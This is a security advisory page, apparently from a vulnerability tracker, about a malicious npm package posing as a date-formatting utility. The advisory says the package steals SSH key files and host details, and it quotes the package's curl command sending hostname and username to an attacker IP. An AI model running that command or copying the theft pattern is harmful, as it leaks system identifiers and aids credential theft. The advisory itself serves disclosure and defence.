Vulnerability
Malicious code in houzidawang807 (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489) Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a `build` script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares `build`), so default `npm install` does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence